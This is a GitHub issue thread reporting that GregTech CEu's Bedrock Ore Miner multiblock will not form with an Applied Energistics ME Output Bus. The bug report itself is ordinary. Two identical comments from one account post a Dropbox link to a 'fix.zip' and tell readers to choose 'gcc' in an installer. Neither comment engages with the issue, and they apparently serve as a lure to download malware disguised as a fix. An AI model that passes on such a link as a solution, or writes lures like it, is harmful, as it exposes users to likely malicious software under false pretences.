### ISSUE TITLE
Bedrock Ore Miner will not accept ME Output bus

### ISSUE THREAD

**Issue by NepJr** [GregTechCEu/GregTechCEu-1.19#1824]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

1.4.0

### Minecraft Version

1.20.1

### Recipe Viewer Installed

JEI

### Environment

Singleplayer

### Cross-Mod Interaction

No

### Other Installed Mods

Applied Energistics 2
GregTech CEu Modern
KubeJS (To create a bedrock ore vein)

### Expected Behavior

The Multiblock will see the ME Output Bus and form the multiblock, then output into it

### Actual Behavior

It does not see the ME Output Bus as a valid output and fails to form the multiblock

### Steps to Reproduce

1) Build the Multiblock, but use a ME Output Bus instead of a normal output bus

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
